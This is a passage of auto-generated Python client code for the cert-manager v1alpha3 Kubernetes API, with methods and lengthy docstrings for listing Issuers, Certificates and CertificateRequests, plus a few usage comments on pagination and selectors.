:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3IssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_issuer_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
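
    # Asynchronous call sketch, following the `async_req=True` pattern from
    # the docstring above; `thread` is an AsyncResult, so `get()` blocks until
    # the HTTP request completes and raises on request errors.
    #
    #   thread = api.list_issuer_for_all_namespaces(async_req=True)
    #   issuer_list = thread.get(timeout=30)  # seconds to wait for the result
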
def list_issuer_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_issuer_for_all_namespaces # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_issuer_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3IssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_issuer_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/issuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3IssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
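
    # Chunked-list sketch using `limit` and `_continue`, as described in the
    # docstring above; the `metadata._continue` attribute name is assumed to
    # mirror the standard kubernetes client list metadata.
    #
    #   issuers, token = [], None
    #   while True:
    #       page = api.list_issuer_for_all_namespaces(limit=100, _continue=token)
    #       issuers.extend(page.items)
    #       token = page.metadata._continue
    #       if not token:  # an empty continue token means no more results
    #           break
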
def list_namespaced_certificate(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_certificate_with_http_info(namespace, **kwargs) # noqa: E501
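
    # Namespaced listing sketch with a label selector, assuming an `api`
    # instance of this class; the selector syntax is the standard Kubernetes
    # form, and the namespace and label shown are illustrative only.
    #
    #   certs = api.list_namespaced_certificate(
    #       'default', label_selector='app.kubernetes.io/instance=my-app')
    #   ready = [c.metadata.name for c in certs.items]
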
def list_namespaced_certificate_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
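
    # Sketch of capturing the list's resourceVersion as a starting point for a
    # later watch, per the `watch`/`resource_version` notes above; the
    # attribute names are assumed to match the generated list model.
    #
    #   cert_list, status, _ = api.list_namespaced_certificate_with_http_info('default')
    #   rv = cert_list.metadata.resource_version  # snapshot to resume a watch from
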
def list_namespaced_certificate_request(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate_request # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_request(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_certificate_request_with_http_info(namespace, **kwargs) # noqa: E501
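
    # Field-selector sketch; for custom resources the API server typically
    # only supports metadata fields, so the selector below is limited to a
    # name match. The namespace and object name are illustrative.
    #
    #   reqs = api.list_namespaced_certificate_request(
    #       'default', field_selector='metadata.name=my-cert-request')
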
def list_namespaced_certificate_request_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate_request # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_request_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequestList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequestList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
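# Illustrative usage sketch (not generated code): chunked listing with `limit`
# and `_continue`, as described in the docstring above. `api` stands for an
# instance of this API class, and `metadata._continue` assumes the usual
# OpenAPI-generator name for the list's `continue` field in this client build.
# >>> items, token = [], None
# >>> while True:
# ...     page = api.list_namespaced_certificate_request('default', limit=100,
# ...                                                    _continue=token)
# ...     items.extend(page.items)
# ...     token = page.metadata._continue
# ...     if not token:
# ...         break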
